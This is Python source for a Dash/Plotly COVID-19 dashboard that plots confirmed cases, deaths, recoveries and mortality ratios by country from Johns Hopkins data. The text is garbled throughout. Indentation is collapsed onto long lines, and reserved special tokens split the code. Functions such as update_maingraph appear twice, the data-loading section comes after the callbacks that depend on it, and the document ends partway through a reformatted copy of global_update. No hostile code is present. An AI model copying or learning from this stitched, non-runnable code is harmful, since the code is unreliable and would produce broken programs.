automargin=True, showline=True, mirror 
=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. 
loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: 
fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 
'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) 
fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality 
Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. 
max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ 
final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), 
y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror 
=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. 
loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server() <|reserved_special_token_1|> <|reserved_special_token_0|> urls = [ 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv' , 
'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv' ] final_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv') final_df = calc_diff_country(final_df) final_df['Date'] = pd.to_datetime(final_df['Date']) final_df['Country_Region'] = final_df['Country_Region'].astype(str) cases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] cases_1000_start = cases_1000_start.reset_index() cases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() cases_1000_start = pd.merge(cases_1000_start, final_df, on=[ 'Country_Region'], how='right') cases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date']) cases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date']) cases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()] cases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days deaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[ 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] deaths_100_start = deaths_100_start.reset_index() deaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() deaths_100_start = pd.merge(deaths_100_start, final_df, on=[ 'Country_Region'], how='right') deaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date']) deaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date']) deaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()] 
deaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days mort = final_df.groupby(['Country_Region'])['Date'].max().reset_index() mort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left') mort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0 colors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa': '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08', 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554', 'Oceania': '#73AF48'} external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) server = app.server app.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'), html.H4(children= 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(), html.H5(children='Global View'), html.P(children= 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:' ), html.Div([html.Ul([html.Li([html.B( 'Cumulative Cases by Country Since First 1000 Cases: '), 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis' ]), html.Li([html.B( 'Cumulative Cases by Country Since First 100 Deaths: '), 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis' ]), html.Li([html.B( 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): ' ), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ]), html.Li([html.B( 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: ' ), 'This plots Recoveries against Deaths on a country by country basis. 
(Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id= 'global-dropdown', options=[{'label': y, 'value': y} for y in [ 'Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)', 'Recoveries vs. Deaths By Country']], placeholder= 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(), html.H5(children='Country View'), html.P( 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:' ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B ('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Deaths: '), 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([ html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country' ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder= 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2', placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html. 
@app.callback(Output(component_id='global-box-1', component_property='figure'),
              [Input(component_id='global-dropdown', component_property='value')])
def global_update(select_global):
    """Build the Global View figure for the selected dropdown option.

    Parameters
    ----------
    select_global : str or None
        Value of the ``global-dropdown``; ``None`` (initial load) falls
        back to the cumulative-cases trend.

    Returns
    -------
    dict
        ``{'data': [...], 'layout': go.Layout}`` consumed by ``dcc.Graph``.
    """
    if select_global == 'Global Cases Trend' or select_global is None:
        # One log-scale line per country, aligned on days since 1000 cases.
        traces = []
        annotations = []
        for _, frame in cases_1000_start.groupby(by='Country_Region'):
            di = frame.sort_values(by=['Days Since 1000 Cases'])
            traces.append(go.Scatter(
                x=di['Days Since 1000 Cases'].tolist(),
                y=di['Confirmed'].tolist(),
                mode='lines',
                line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]],
                          width=1),
                opacity=0.6,
                text=di.Country_Region.tolist(),
                legendgroup=list(di.loc[:, 'Continent'])[0],
                hovertemplate='<b>%{text}</b><br>'
                              + '<br>Confirmed Cases: %{y}<br>'
                              + 'Days Since First 1000 Cases: %{x}<br>',
                showlegend=False))
            # Country label pinned just past the end of its line (log-y axis,
            # so the annotation y is the log10 of the data value).
            annotations.append({
                'x': int(di['Days Since 1000 Cases'].max() + 1.5),
                'y': np.log10(int(di['Confirmed'].max())),
                'xref': 'x', 'yref': 'y', 'showarrow': False,
                'text': list(di.loc[:, 'Country_Region'])[0],
                'xanchor': 'right', 'yanchor': 'middle', 'align': 'center',
                'font': {'size': 8, 'color': 'black'},
                'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,
                'bgcolor': '#ffffff', 'opacity': 0.6})
        # Guide lines: exp(ln2/3 * t) and exp(ln2/7 * t) doubling references.
        days = list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))
        traces.append(go.Scatter(
            x=days,
            y=[1000 * math.exp(0.2310491 * i) for i in days],
            name='Cases Double Every 3 Days', mode='lines', opacity=0.25,
            line=dict(color='grey', width=3, dash='dash'),
            text=['# of Cases Double Every 3 Days'],
            hovertemplate='<b>Cases Double Every 3 Days</b>', showlegend=True))
        traces.append(go.Scatter(
            x=days,
